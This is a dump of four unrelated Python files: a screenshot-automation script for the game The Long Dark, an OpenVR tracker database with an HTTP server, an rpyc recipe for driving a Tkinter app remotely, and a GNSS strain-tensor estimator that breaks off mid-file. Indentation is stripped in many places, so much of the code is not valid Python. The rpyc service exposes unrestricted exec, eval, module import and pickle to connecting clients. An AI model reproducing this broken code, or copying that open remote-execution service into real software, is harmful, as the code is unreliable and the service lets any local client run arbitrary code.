interaction.py
# coding: utf-8
# Originally from
# https://github.com/PPartisan/THE_LONG_DARK
# Simply adapted to LINUX by Bernardo Alves Furtado
import threading
import time
import psutil
from pylab import rcParams
from pynput.keyboard import Key, Controller
import mapping
rcParams['figure.figsize'] = 12, 9.5
def is_tld_running():
    # Return True while the game process ('tld.x86_64') is running.
    for n in psutil.pids():
        try:
            if psutil.Process(n).name() == 'tld.x86_64':
                return True
        except psutil.NoSuchProcess:
            pass
    return False
def background(func, args):
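    # Fire-and-forget helper: run func(*args) on a separate (non-daemon) thread.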
th = threading.Thread(target=func, args=args)
th.start()
class Interaction:
def __init__(self):
self.recording = True
self.keyboard = Controller()
def start_recording(self):
print('Started recording')
self.recording = True
def stop_recording(self):
print('Stopped recording')
self.recording = False
def press(self):
        print('Pressed the button')
self.keyboard.press(Key.f8)
self.keyboard.release(Key.f8)
def start_interactive_mapping(self, s_path, f_path):
        print('Started!')
if self.recording:
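            # Capture loop: trigger an in-game screenshot (F8), extract the map
            # coordinates from the new screenshots, append them to coords.txt,
            # delete the processed screenshots, then wait 30 seconds.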
while is_tld_running():
self.press()
coord = mapping.read_coords_from_screenshots(s_path)
mapping.write_coords_to_file(coord, f_path + "coords.txt", "a")
mapping.delete_screenshots(s_path)
time.sleep(30)
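A minimal usage sketch (not part of the original script); the screenshot and output directories below are placeholders for wherever The Long Dark saves its F8 screenshots and wherever coords.txt should be written:

if __name__ == '__main__':
    interaction = Interaction()
    # Run the capture loop on a background thread so the main thread stays free.
    background(interaction.start_interactive_mapping,
               ('/path/to/screenshots/', '/path/to/output/'))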
RMTRMS.py
import sqlite3
from sqlite3 import Error as sqliteError
import bottle
import threading
import triad_openvr
from openvr import OpenVRError
class SteamVRNotFoundError(Exception):
""" Raised when SteamVR is not installed"""
pass
class Tracker:
def __init__(self, vr=None, db=None, trackerID=None, serial=None):
self.db = db
if vr:
self.vr = vr
self.trackerID = trackerID
self.index = self.vr.devices[self.trackerID].index
self.serial = self.vr.devices[self.trackerID].get_serial()
self.db.set_tracker_active_status(self, True)
self.update_position()
self.name = db.get_tracker_name(self)
            if self.name is None:
self.db.set_default_tracker_name(self)
self.name = self.db.get_tracker_name(self)
else:
self.serial = serial
self.name = self.db.get_tracker_name(self)
self.db.set_tracker_active_status(self, False)
def update_position(self):
"""Updates the position of the tracker if it is active.
"""
if self.active is True:
try:
pose = self.vr.devices[self.trackerID].get_pose_euler()
except AttributeError:
self.db.set_tracker_active_status(self, False)
return None
except KeyError:
self.db.set_tracker_active_status(self, False)
return None
if pose == [0, 0, 0, 0, 0, 0]:
self.db.set_tracker_active_status(self, False)
return None
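            # Store the pose; note that the second and third components are
            # assigned to self.z and self.y respectively (vertical axis swap).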
self.x = pose[0]
self.z = pose[1]
self.y = pose[2]
self.pitch = pose[3]
self.yaw = pose[4]
self.roll = pose[5]
self.db.update_tracker_position(self)
else:
try:
pose = self.vr.devices[self.trackerID].get_pose_euler()
self.db.set_tracker_active_status(self, True)
except AttributeError:
pass
except KeyError:
pass
def rename(self, name):
"""Renames the tracker in the database
Arguments:
name {String} -- The new name for the tracker
"""
self.db.set_tracker_name(self, name)
self.name = name
def identify(self):
"""Turns on the rumble output of the tracker for 1 second
"""
self.db.vr.vr.triggerHapticPulse(self.index, 0, 1000000)
class Database:
"""Database object that can interact with an SQlite database, as well as OpenVR.
Arguments:
db {String} -- Path to database
"""
def __init__(self, db, vr=True):
self.databasePath = db
try:
self.db = sqlite3.connect(db)
except sqliteError as e:
print(e)
self.curs = self.db.cursor()
self.curs.execute("PRAGMA main.synchronous=NORMAL")
if vr:
try:
self.vr = triad_openvr.triad_openvr()
except OpenVRError:
raise SteamVRNotFoundError
def get_module_list(self):
"""Returns a list of modules.
Returns:
List -- list of Strings with module names.
"""
try:
moduleList = self.curs.execute("SELECT module FROM modules").fetchall()
for index, module in enumerate(moduleList):
moduleList[index] = module[0]
return moduleList
except sqliteError as e:
print(e)
return None
def get_tracker_list(self):
"""Returns a list of tracker objects.
Returns:
List -- list of Tracker objects
"""
try:
trackerList = self.curs.execute("SELECT serial FROM trackers").fetchall()
for index, tracker in enumerate(trackerList):
trackerList[index] = tracker[0]
activeTrackers = []
self.vr.update_device_list()
for device in self.vr.devices:
if "tracker" not in device:
continue
activeTrackers.append(Tracker(vr=self.vr, db=self, trackerID=device))
for tracker in activeTrackers:
try:
trackerList.remove(tracker.serial)
except ValueError:
pass
for index, tracker in enumerate(trackerList):
trackerList[index] = Tracker(db=self, serial=tracker)
trackerList.extend(activeTrackers)
return trackerList
except sqliteError as e:
print(e)
return None
def get_tracking_status(self, module):
"""Returns the tracking status of the specified module.
Arguments:
module {String} -- The module of which the tracking status will be returned.
Returns:
bool -- Tracking status of the module.
"""
try:
tracked = self.curs.execute(
"SELECT tracked FROM modules WHERE module=:module", (module,)
).fetchone()[0]
return tracked
except sqliteError as e:
print(e)
return None
def get_tracker_name(self, tracker):
"""Returns the name of the tracker.
Arguments:
tracker {Tracker} -- The tracker of which the name will be returned.
Returns:
String -- Name of specified module.
"""
try:
return self.curs.execute(
"SELECT name FROM trackers WHERE serial=:serial", (tracker.serial,)
).fetchone()[0]
except sqliteError as e:
print(e)
except TypeError:
return None
def get_assigned_tracker(self, module):
"""Returns the tracker assigned to a module.
Arguments:
module {String} -- The module whose tracker will be returned.
Returns:
tracker {Tracker} -- Tracker that is assigned to the module.
"""
try:
tracker = self.curs.execute(
"SELECT tracker FROM modules WHERE module=:module", {"module": module}
).fetchone()[0]
trackerList = self.get_tracker_list()
for trackerFromList in trackerList:
if tracker == trackerFromList.serial:
tracker = trackerFromList
break
return tracker
except sqliteError as e:
print(e)
return None
except TypeError:
return None
def get_assigned_module(self, tracker):
"""Returns the module which the tracker is assigned to
Arguments:
tracker {Tracker} -- Tracker whose assigned module will be returned
Returns:
module {String} -- Name of the module which the tracker is assigned to
"""
try:
module = self.curs.execute(
"SELECT module FROM modules WHERE tracker=:serial",
{"serial": tracker.serial},
).fetchone()[0]
return module
except sqliteError as e:
print(e)
return None
except TypeError:
return None
def get_module_position(self, module):
"""Returns the position of the specified module
Arguments:
module {String} -- The name of the module
"""
try:
position = self.curs.execute("SELECT positionX,positionY,yaw FROM positionOut WHERE module=:module", {"module" : module}).fetchone()
return position
except sqliteError as e:
print(e)
return None
def set_module_tracking_status(self, module, status):
"""Sets the tracking status of the specified module.
Arguments:
module {String} -- The module of which the status will be modified.
status {bool} -- The tracking status of the module. 1 for tracking, 0 for not tracking.
"""
try:
self.curs.execute(
"UPDATE modules SET tracked=:status WHERE module=:module",
(status, module),
)
except sqliteError as e:
print(e)
self.db.commit()
def set_tracker_active_status(self, tracker, status):
"""Sets the active status of the specified tracker in the database
Arguments:
            tracker {Tracker} -- The tracker whose active status will be modified.
status {bool} -- The active status of the tracker.
"""
try:
self.curs.execute(
"UPDATE trackers SET active=:status WHERE serial=:serial",
(status, tracker.serial),
)
tracker.active = status
except sqliteError as e:
print(e)
self.db.commit()
def set_tracker_name(self, tracker, name):
"""Sets the name of the tracker.
Arguments:
tracker {Tracker} -- The tracker of which the name will be modified.
name {String} -- The name which will be assigned to the tracker.
"""
try:
self.curs.execute(
"UPDATE trackers SET name=:name WHERE serial=:serial",
(name, tracker.serial),
)
tracker.name = name
except sqliteError as e:
print(e)
self.db.commit()
def set_default_tracker_name(self, tracker):
try:
self.curs.execute(
"SELECT serial FROM trackers WHERE serial=:serial;",
{"serial": tracker.serial},
)
params = {
"name": "Tracker " + str(self.curs.lastrowid),
"serial": tracker.serial,
}
self.curs.execute(
"UPDATE trackers SET name=:name WHERE serial=:serial AND name IS NULL;",
params,
)
except sqliteError as e:
print(e)
self.db.commit()
def assign_tracker(self, module, tracker):
"""Assigns a tracker serial to a module.
Arguments:
module {String} -- The module to which the tracker will be assigned.
tracker {Tracker} -- The tracker which will be assigned to the module
"""
params = {"module": module, "tracker": tracker.serial}
sql = """
UPDATE modules SET tracker=:tracker WHERE module=:module
"""
try:
self.curs.execute(
"UPDATE modules SET tracker=NULL, tracked=0 WHERE tracker=:tracker",
{"tracker": tracker.serial},
)
self.curs.execute(sql, params)
except sqliteError as e:
print(e)
self.db.commit()
def update_tracker_position(self, tracker):
"""Updates the position of the tracker in the database
Arguments:
tracker {Tracker} -- The tracker whose position will be updated in the database
"""
        if not tracker.active:
print("Error: Tracker is not tracked\n")
return None
params = {
"serial": tracker.serial,
"active": tracker.active,
"positionX": tracker.x,
"positionY": tracker.y,
"positionZ": tracker.z,
"yaw": tracker.yaw,
"pitch": tracker.pitch,
"roll": tracker.roll,
}
sql = """
UPDATE trackers SET positionX=:positionX,
positionY=:positionY,
positionZ=:positionZ,
yaw=:yaw,
pitch=:pitch,
roll=:roll
WHERE serial = :serial;
"""
try:
self.curs.execute(sql, params)
except sqliteError as e:
print(e)
try:
self.curs.execute("SELECT changes()")
            if self.curs.fetchone()[0] == 0:
sql = """
INSERT INTO trackers (serial,
active,
positionX,
positionY,
positionZ,
yaw,
pitch,
roll)
VALUES(:serial, :active, :positionX, :positionY, :positionZ, :yaw, :pitch, :roll);
"""
try:
self.curs.execute(sql, params)
except sqliteError as e:
print(e)
# update name based on ID if no name is given
params2 = {
"name": "Tracker " + str(self.curs.lastrowid),
"serial": params["serial"],
}
sql = """
UPDATE trackers SET name=:name WHERE serial = :serial AND name IS NULL;
"""
self.curs.execute(sql, params2)
except sqliteError as e:
print(e)
self.db.commit()
def remove_tracker(self, tracker):
"""Removes the specified tracker from the database
        Arguments:
            tracker {Tracker} -- The tracker that will be deleted
"""
try:
self.curs.execute(
"DELETE FROM trackers WHERE serial = :serial",
{"serial": tracker.serial},
)
self.curs.execute(
"UPDATE modules SET tracker=NULL, tracked=0 WHERE tracker=:serial",
{"serial": tracker.serial},
)
self.db.commit()
except sqliteError as e:
print(e)
class QuietServer(bottle.ServerAdapter):
"""An adapted server from https://stackoverflow.com/a/16056443
"""
def run(self, handler):
from wsgiref.simple_server import make_server, WSGIRequestHandler
class QuietHandler(WSGIRequestHandler):
def log_request(*args, **kw): pass
self.options['handler_class'] = QuietHandler
self._server = make_server(self.host, self.port, handler, **self.options)
self._server.serve_forever()
def stop(self):
self._server.shutdown()
self._server.server_close()
class Server:
"""Server object that returns 7 values
The output is in the format:
{Bool} {Float} {Float} {Float} {Float} {Float} {Float}
These correspond to:
Tracker Active -- Tracker X Position -- Tracker Y Position -- Tracker Yaw -- Module X Position -- Module Y Position -- Module Yaw
Returns:
Server {QuietServer} -- The server the application is using
"""
def __init__(self, databasePath=None, host="0.0.0.0", port=8000):
self._database = Database(databasePath)
self._host = host
self._port = port
self._app = bottle.Bottle()
self._route()
self.server = QuietServer(host=self._host, port=self._port)
def _route(self):
self._app.route("/modules/<module_name>", callback=self.get_module)
def start(self):
"""Run the server
"""
self._app.run(server=self.server)
def stop(self):
"""Stop the server
"""
self.server.stop()
self._app.close()
def stop_thread(self):
threading.Thread(target=self.stop, daemon=True).start()
def get_module(self, module_name=None):
"""Return the desired module's tracker and position information
Keyword Arguments:
module_name {String} -- Name of the module as it appears in the database (case sensitive) (default: {None})
Returns:
Active {Bool} -- The active status of the assigned tracker.
Tracker Position X {Float} -- X position of the assigned tracker.
Tracker Position Y {Float} -- Y position of the assigned tracker.
Tracker Yaw {Float} -- Yaw of the assigned tracker.
Module Position X {Float} -- Desired X position of the specified module
Module Position Y {Float} -- Desired Y position of the specified module
Module Yaw {Float} -- Desired yaw of the specified module
"""
if self._database.get_tracking_status(module_name):
return "0 0 0 0 0 0 0"
else:
tracker = self._database.get_assigned_tracker(module_name)
if tracker is None:
return "0 0 0 0 0 0 0"
moduleX, moduleY, moduleYaw = self._database.get_module_position(module_name)
if tracker.active:
response = "{:b} {:f} {:f} {:f} {:f} {:f} {:f}".format(
1, tracker.x, tracker.y, tracker.yaw, moduleX, moduleY, moduleYaw
)
else:
response = "0 0 0 0 0 0 0"
return response
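A minimal usage sketch (not part of the original module); it assumes SteamVR is running and that an RMTRMS SQLite database exists at the placeholder path below:

if __name__ == "__main__":
    server = Server(databasePath="path/to/RMTRMS.db", host="0.0.0.0", port=8000)
    try:
        server.start()   # blocks; serves e.g. GET /modules/<module_name>
    except KeyboardInterrupt:
        server.stop()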
recipe-580721.py
# Author: Miguel Martinez Lopez
#
# This code requires rpyc.
# You can install rpyc by typing:
# pip install rpyc
#
# Run this code and then, in another interactive interpreter, write this:
# >>> import rpyc
# ... c = rpyc.classic.connect("localhost")
# >>> c.execute("from Tkinter import Label; label=Label(app, text='a label')")
# ... c.execute("label.pack()")
# >>> app = c.eval("app")
# >>> app.responsive_button.invoke()
from rpyc.utils.server import ThreadedServer
from rpyc.utils.classic import DEFAULT_SERVER_PORT
from rpyc.core.service import Service, ModuleNamespace
from rpyc.lib.compat import execute, is_py3k
class PublicService(Service):
exposed_namespace = {}
def on_connect(self):
self._conn._config.update(dict(
allow_all_attrs = True,
allow_pickle = True,
allow_getattr = True,
allow_setattr = True,
allow_delattr = True,
import_custom_exceptions = True,
instantiate_custom_exceptions = True,
instantiate_oldstyle_exceptions = True,
))
# shortcuts
self._conn.modules = ModuleNamespace(self._conn.root.getmodule)
self._conn.eval = self._conn.root.eval
self._conn.execute = self._conn.root.execute
self._conn.namespace = self._conn.root.namespace
if is_py3k:
self._conn.builtin = self._conn.modules.builtins
else:
self._conn.builtin = self._conn.modules.__builtin__
self._conn.builtins = self._conn.builtin
def exposed_execute(self, text):
"""execute arbitrary code (using ``exec``)"""
execute(text, PublicService.exposed_namespace)
def exposed_eval(self, text):
"""evaluate arbitrary code (using ``eval``)"""
return eval(text, PublicService.exposed_namespace)
def exposed_getmodule(self, name):
"""imports an arbitrary module"""
return __import__(name, None, None, "*")
def exposed_getconn(self):
"""returns the local connection instance to the other side"""
return self._conn
if __name__ == "__main__":
import threading
from Tkinter import Tk, Button
import tkMessageBox
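    # Note: these are the Python 2 module names; on Python 3 the equivalents
    # would be 'from tkinter import Tk, Button' and
    # 'from tkinter import messagebox as tkMessageBox'.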
class App(Tk):
def __init__(self):
Tk.__init__(self)
self.responsive_button = Button(self, text="It's responsive", command = lambda:tkMessageBox.showinfo("alert window", "It's responsive!"))
self.responsive_button.pack()
app = App()
# Add here all the exposed objects in the shared namespace
PublicService.exposed_namespace = {"app":app}
t = threading.Thread(target=lambda: ThreadedServer(PublicService, hostname = "localhost", port=DEFAULT_SERVER_PORT).start())
t.daemon=True
t.start()
app.mainloop()
StrainTensor.py
#! /usr/bin/python
#-*- coding: utf-8 -*-
from __future__ import print_function
import sys
import os
import time
from datetime import datetime
from copy import deepcopy
from math import degrees, radians, floor, ceil
import numpy
from scipy.spatial import Delaunay
import argparse
from pystrain.strain import *
from pystrain.geodesy.utm import *
from pystrain.iotools.iparser import *
import pystrain.grid
Version = 'StrainTensor.py Version: 1.0-r1'
STRAIN_OUT_FILE = 'strain_info.dat'
STATISTICS_FILE = 'strain_stats.dat'
def cut_rectangle(xmin, xmax, ymin, ymax, sta_lst, sta_list_to_degrees=False):
""" Filter stations that are located within a rectange. The rectangle is
+-------+--ymax
| |
+-------+--ymin
| |
xmin xmax
The function will return a new list, where for each of the stations,
the following is true:
* xmin <= station.lon <= xmax and
* ymin <= station.lat <= ymax
If the argument 'sta_list_to_degrees' is set to True, then before
comaring, each of the station's lon and lat are transformed to degrees
(they are supposed to be in radians).
"""
new_sta_lst = []
for sta in sta_lst:
if sta_list_to_degrees:
slon = degrees(sta.lon)
slat = degrees(sta.lat)
else:
slon = sta.lon
slat = sta.lat
if slon >= xmin and slon <= xmax and slat >= ymin and slat <= ymax:
new_sta_lst.append(sta)
return new_sta_lst
def write_station_info(sta_lst, filename='station_info.dat'):
""" Write station information to an output file. sta_list if a list of
Stations.
Station information are written as:
Station Longtitude Latitude Ve Vn sVe sVn
deg. deg mm/yr
The file to be written is named as $filename
"""
with open(filename, 'w') as fout:
print('{:^10s} {:^10s} {:^10s} {:7s} {:7s} {:7s} {:7s}'.format(
'Station', 'Longtitude', 'Latitude', 'Ve', 'Vn', 'sVe', 'sVn'),
file=fout)
print('{:^10s} {:^10s} {:^10s} {:7s} {:7s} {:7s} {:7s}'.format(
'', 'deg.', 'deg', 'mm/yr', 'mm/yr', 'mm/yr', 'mm/yr'),
file=fout)
for idx, sta in enumerate(sta_lst):
print('{:10s} {:+10.5f} {:10.5f} {:+7.2f} {:+7.2f} {:+7.3f} {:+7.3f}'.format(
sta.name, degrees(sta.lon), degrees(sta.lat), sta.ve*1e03,
sta.vn*1e03, sta.se*1e03, sta.sn*1e03), file=fout)
return
def print_model_info(fout, cmd, clargs):
""" Write basic information to an open output stream (e.g. a file).
"""
print('{:}'.format(Version), file=fout)
print('Command used:\n\t{:}'.format(' '.join(cmd)), file=fout)
print('Run at: {:}'.format(datetime.now().strftime('%c')), file=fout)
print('Command line switches/options parsed:', file=fout)
for key in clargs:
print('\t{:20s} -> {:}'.format(key, clargs[key]), file=fout)
return
def compute__(igrd, sta_list_utm, utm_lcm, fout, fstats, vprint_fun, **dargs):
""" Function to perform the bulk of a Strain Tensor estimation.
For each of the grid cells, a ShenStrain object will be created, using
the list of stations and the **dargs options.
Args:
grd (pystrain::Grid): The grid; one straintensor per cell is
estimated (at the centre of the grid)
sta_list_utm (list of Station): The list of stations to be used for
strain tensor estimation
utmzone (float): The UTM zone used to convert ellipsoidal to
UTM coordinates.
fout (output stream): An (open) output stream where estimation results
(aka strain information) are to be written
fstats (output stream): An (open) output stream where estimation
statistics are written
vprint_fun (function) : A function that handles printing. Based on
user options we may want or not to print
verbose information. This function does exactly
that. Normally, this function is just the
normal print function or a no-opt, see vprint(...)
defined in __main__
**dargs (dictionary) : A list of parameters to use when constructing
the individual Strain Tensors
Warning:
The output streams are passed in open but are closed by the function!
Leaving the streams open, may cause not proper reporting of results
in Python v2.x and in multithreading mode (probably the streams are
not flushed before returning or something). Anyway, always close the
streams before exiting.
"""
#print('--> Thread given grid : X:{:}/{:}/{:} Y:{:}/{:}/{:}'.format(igrd.x_min, igrd.x_max, igrd.x_step, igrd.y_min, igrd.y_max, igrd.y_step))
node_nr, nodes_estim = 0, 0
for x, y in igrd:
clat, clon = radians(y), radians(x)
#print('--> computing tensor at lon {:}, lat {:}'.format(x, y))
N, E, ZN, lcm = ell2utm(clat, clon, Ellipsoid("wgs84"), utm_lcm)
#assert ZN == utmzone
assert utm_lcm == lcm
vprint_fun('[DEBUG] Grid point at {:+8.4f}, {:8.4f} or E={:}, N={:}'.format(
x, y, E, N))
if not dargs['multiproc_mode']:
            print('[DEBUG] {:5d}/{:7d}'.format(node_nr+1, igrd.xpts*igrd.ypts), end="\r")
## Construct the Strain instance, with all args (from input)
# sstr = ShenStrain(E, N, sta_list_utm, **dargs)
sstr = ShenStrain(E, N, clat<0e0, sta_list_utm, **dargs)
## check azimouth coverage (aka max β angle)
if degrees(max(sstr.beta_angles())) <= dargs['max_beta_angle']:
try:
sstr.estimate()
                vprint_fun('[DEBUG] Computed tensor at {:+8.4f} {:+8.4f} for node {:3d}/{:3d}'.format(x, y, node_nr+1, igrd.xpts*igrd.ypts))
sstr.print_details_v2(fout, utm_lcm)
if fstats: print('{:+9.4f} {:+10.4f} {:6d} {:14.2f} {:10.2f} {:12.3f}'.format(x,y,len(sstr.__stalst__), sstr.__options__['d_coef'],sstr.__options__['cutoff_dis'], sstr.__sigma0__), file=fstats)
nodes_estim += 1
except RuntimeError:
vprint_fun('[DEBUG] Too few observations to estimate strain at {:+8.4f}, {:8.4f}. Point skipped.'.format(x,y))
except ArithmeticError:
vprint_fun('[DEBUG] Failed to compute parameter VcV matrix for strain at {:+8.4f}, {:8.4f}. Point skipped'.format(x,y))
else:
vprint_fun('[DEBUG] Skipping computation at {:+8.4f},{:8.4f} because of limited coverage (max_beta= {:6.2f}deg.)'.format(x, y, degrees(max(sstr.beta_angles()))))
node_nr += 1
print('[DEBUG] Estimated Strain Tensors for {} out of {} nodes'.format(nodes_estim, node_nr))
fout.close()
if fstats: fstats.close()
## If only the formatter_class could be:
##+ argparse.RawTextHelpFormatter|ArgumentDefaultsHelpFormatter ....
## Seems to work with multiple inheritance!
class myFormatter(
argparse.ArgumentDefaultsHelpFormatter,
argparse.RawTextHelpFormatter):
pass
parser = argparse.ArgumentParser(
formatter_class=myFormatter,
description='Estimate Strain Tensor(s) from GNSS derived velocities.',
epilog=('''National Technical University of Athens,
Dionysos Satellite Observatory\n
Send bug reports to:
Xanthos Papanikolaou, xanthos@mail.ntua.gr
Dimitris Anastasiou,dganastasiou@gmail.com
September, 2021'''))
parser.add_argument('-i', '--input-file',
default=argparse.SUPPRESS,
metavar='INPUT_FILE',
dest='gps_file',
required=True,
    help='The input file. This must be an ascii file containing the columns: \'station-name longitude latitude Ve Vn SigmaVe SigmaVn Sne time-span\'. Longitude and latitude must be given in decimal degrees; velocities (in east and north components) in mm/yr. Columns should be separated by whitespace. Note that at this point the last two columns (aka Sne and time-span) are not used, so they could have random values.')
parser.add_argument('--x-grid-step',
default=0.5,
metavar='X_GRID_STEP',
dest='x_grid_step',
type=float,
required=False,
    help='The x-axis grid step size in degrees. This option is only relevant if the program computes more than one strain tensor.')
parser.add_argument('--y-grid-step',
default=0.5,
metavar='Y_GRID_STEP',
dest='y_grid_step',
type=float,
required=False,
    help='The y-axis grid step size in degrees. This option is only relevant if the program computes more than one strain tensor.')
parser.add_argument('-m', '--method',
default='shen',
metavar='METHOD',
dest='method',
choices=['shen', 'veis'],
required=False,
    help='Choose a method for strain estimation. If \'shen\' is passed in, the estimation will follow the algorithm described in Shen et al, 2015, using a weighted least squares approach. If \'veis\' is passed in, then the region is going to be split into Delaunay triangles and a strain tensor estimated at each barycentre.')
parser.add_argument('-r', '--region',
default=argparse.SUPPRESS,
metavar='REGION',
dest='region',
    help='Specify a region; any station (in the input file) falling outside will be omitted. The region should be given as a rectangle, specifying min/max values in longitude and latitude (using decimal degrees). E.g. \"[...] --region=21.0/23.5/36.0/38.5 [...]\"',
required=False)
parser.add_argument('-c', '--cut-excess-stations',
dest='cut_outoflim_sta',
    help='This option is only considered if the \'-r\' option is set. If this option is enabled, then any station (from the input file) outside the region limits (passed in via the \'-r\' option) is not considered in the strain estimation.',
action='store_true')
parser.add_argument('-b', '--barycenter',
dest='one_tensor',
action='store_true',
help='Only estimate one strain tensor, at the region\'s barycentre.')
parser.add_argument('--max-beta-angle',
default=180,
metavar='MAX_BETA_ANGLE',
dest='max_beta_angle',
type=float,
required=False,
    help='Only relevant for \'--method=shen\'. Before estimating a tensor, the angles between consecutive points are computed. If the max angle is larger than max_beta_angle (in degrees), then the point is omitted (aka no tensor is computed). This option is used to exclude points from the computation that only have limited geometric coverage (e.g. the edges of the grid).')
parser.add_argument('-t', '--weighting-function',
default='gaussian',
metavar='WEIGHTING_FUNCTION',
dest='ltype',
choices=['gaussian', 'quadratic'],
required=False,
    help='Only relevant for \'--method=shen\'. Choose between a \'gaussian\' or a \'quadratic\' spatial weighting function.')
parser.add_argument('--Wt',
default=24,
metavar='Wt',
dest='Wt',
type=int,
required=False,
    help='Only relevant for \'--method=shen\' and if \'d-param\' is not passed in. Let W = Σ_i G_i be the sum of the reweighting coefficients of the data, and let Wt be the threshold of W. For a given Wt, the smoothing constant D is determined so that W(D) = Wt. It should be noted that W is a function of the interpolation coordinate, therefore for the same Wt assigned, D varies spatially based on the in situ data strength; that is, the denser the local data array is, the smaller D is, and vice versa.')
parser.add_argument('--dmin',
default=1,
metavar='D_MIN',
dest='dmin',
type=int,
required=False,
    help='Only relevant for \'--method=shen\' and if \'d-param\' is not passed in. This is the lower limit for searching for an optimal D-parameter value. Unit is km.')
parser.add_argument('--dmax',
default=500,
metavar='D_MAX',
dest='dmax',
type=int,
required=False,
    help='Only relevant for \'--method=shen\' and if \'d-param\' is not passed in. This is the upper limit for searching for an optimal D-parameter value. Unit is km.')
parser.add_argument('--dstep',
default=2,
metavar='D_STEP',
dest='dstep',
type=int,
required=False,
    help='Only relevant for \'--method=shen\' and if \'d-param\' is not passed in. This is the step size for searching for an optimal D-parameter value. Unit is km.')
parser.add_argument('--d-param',
default=None,
metavar='D_PARAMETER',
dest='d_coef',
type=float,
required=False,
    help='Only relevant for \'--method=shen\'. This is the \'D\' parameter for computing the spatial weights. If this option is used, then the parameters dmin, dmax, dstep and Wt are not used.')
parser.add_argument('-g', '--generate-statistics',
dest='generate_stats',
    help='Only relevant when \'--method=shen\' and \'--barycenter\' is not set. This option will create an output file, named \'strain_stats.dat\', where estimation info and statistics will be written.',
action='store_true')
parser.add_argument('--verbose',
dest='verbose_mode',
help='Run in verbose mode (show debugging messages)',
action='store_true')
parser.add_argument('--multicore',
dest='multiproc_mode',
help='Run in multithreading mode',
action='store_true')
parser.add_argument('-v',
dest='version',
help='Display version and exit.',
action='store_true')
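## Example invocation (illustrative; the input file name 'velocities.dat' is a
## placeholder, and the region values are those from the '--region' help text):
##   ./StrainTensor.py -i velocities.dat -m shen --region=21.0/23.5/36.0/38.5 \
##       --x-grid-step=0.5 --y-grid-step=0.5 -g --verbose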
if __name__ == '__main__':
    ## Wait!! maybe the user just passed in "-v" without an input file. Do not
    ##+ resolve the parser yet (it'll cause an error)
if len(sys.argv[1:]) == 1 and sys.argv[1] == "-v":
print('{}'.format(Version))
sys.exit(0)
## Time the program (for opt/ing purpose only)
start_time = time.time()
## Parse command line arguments and stack them in a dictionary
args = parser.parse_args()
dargs = vars(args)
## Wait!! maybe we only want the version
if args.version:
print('{}'.format(Version))
sys.exit(0)
## Verbose print (function only exists in verbose mode)
vprint = print if args.verbose_mode else lambda *a, **k: None
    ## if in multithreading mode, load the module
if args.multiproc_mode:
if args.method == 'shen':
import multiprocessing
cpu_count = multiprocessing.cpu_count()
print("[DEBUG] Using multithreaded version; available CPU's: {:02d}".format(
cpu_count))
else:
print("[DEBUG] Multithreading is only available when using shen method; ignoring the \"--multicore\" switch!")
## import dill module for windows multithreading processing
if args.multiproc_mode and os.name == 'nt':
print("[DEBUG] Import dill module for windows multithreading processing")
import dill
## If needed, open a file to write model info and statistics
fstats = open(STATISTICS_FILE, 'w') if args.generate_stats else None
if fstats: print_model_info(fstats, sys.argv, dargs)
## Parse stations from input file; at input, station coordinates are in decimal
##+ degrees and velocities are in mm/yr.
## After reading, station coordinates are in radians and velocities are in
##+ m/yr.
if not os.path.isfile(args.gps_file):
print('[ERROR] Cannot find input file \'{}\'.'.format(
args.gps_file), file=sys.stderr)
sys.exit(1)
try:
sta_list_ell = parse_ascii_input(args.gps_file, args.method=='shen')
except ValueError as err:
print(err)
print('[ERROR] Failed to parse input file: \"{:}\"'.format(args.gps_file))
sys.exit(1)
print('[DEBUG] Reading station coordinates and velocities from {}'.format(
args.gps_file))
print('[DEBUG] Number of stations parsed: {}'.format(len(sta_list_ell)))
## If a region is passed in, resolve it (from something like
##+ '21.0/23.5/36.0/38.5'). Note that limits are in dec. degrees.
##+ If cutting out-of-limits stations option is set, or method is veis, then
##+ only keep the stations that fall within it.
## The region coordinates (min/max pairs) should be given in decimal degrees.
if 'region' in args:
try:
lonmin, lonmax, latmin, latmax = [ float(i) for i in args.region.split('/') ]
if args.cut_outoflim_sta or args.method == 'veis':
Napr = len(sta_list_ell)
# Note that we have to convert radians to degrees for station
#+ coordinates, hence 'sta_list_to_degrees=True'
sta_list_ell = cut_rectangle(lonmin, lonmax, latmin, latmax, sta_list_ell, True)
Npst = len(sta_list_ell)
vprint('[DEBUG] Stations filtered to fit input region: {:7.3f}/{:7.3f}/{:7.3f}/{:7.3f}'.format(lonmin, lonmax, latmin, latmax))
vprint('[DEBUG] {:4d} out of original {:4d} stations remain to be processed.'.format(Npst, Napr))
if Npst < 3:
print('[DEBUG] Left with only {:d} stations! Cannot do anything'.format(Npst))
sys.exit(0)
        except ValueError:
            print('[ERROR] Failed to parse region argument \"{:}\"'.format(
                args.region), file=sys.stderr)
            sys.exit(1)
## Filter out stations that are never going to be used. This is an opt!
    ## This is only needed when the user has specified:
##+ '[...] --region=a/b/c/d --method='shen' [...]' and NOT --cut-excess-station
##+ because:
##+ * If there is no region, we suppose that we want all the region covered
##+ by the stations
    ##+ * If method='veis' we are using Delaunay triangles anyway
##+ * If '--cut-excess-station' is set, we have already cut-off any stations
##+ outside the wanted region
## This is performed as follows:
##+ 1. Compute distance from centre of region to point (lonmax, latmax), aka R
##+ 2. Compute D: User has specified 'D_PARAMETER'? D=2*D_PARAMETER else D=2*D_MAX
##+ 3. Compute C: WEIGHTING_FUNCTION='gaussian'? C=R+D*2.15 else C=R+D*10
##+ 4. Filter out any station that has distance from the centre > C
## Note that all distances are computed via the Haversine formula and all units
##+ are Km
if 'region' in args and not args.method == 'veis' and not args.cut_outoflim_sta:
vprint('[DEBUG] Filtering stations based on their distance from region barycentre.')
Napr = len(sta_list_ell)
mean_lon, mean_lat = radians(lonmin+(lonmax-lonmin)/2e0), radians(latmin+(latmax-latmin)/2e0)
bc = Station(lon=mean_lon, lat=mean_lat)
endpt = Station(lon=radians(lonmax), lat=radians(latmax))
cutoffdis = abs(endpt.haversine_distance(bc)/1e3) # barycentre to endpoint (km)
d = 2e0*(args.d_coef if args.d_coef is not None else args.dmax)
cutoffdis += d * (2.15e0 if args.ltype == 'gaussian' else 10e0) # in km
vprint('[DEBUG] Using cut-off distance {:10.3f}km'.format(cutoffdis))
sta_list_ell = [ s for s in sta_list_ell if s.haversine_distance(bc)/1e3 <= cutoffdis ]
Npst = len(sta_list_ell)
print('[DEBUG] {:4d} out of original {:4d} stations remain to be processed.'.format(Npst, Napr))
## Make a new station list (copy of the original one), where all coordinates
##+ are in UTM. All points should belong to the same ZONE.
## Note that station ellipsoidal coordinates are in radians while the
##+ cartesian (projection) coordinates are in meters.
##
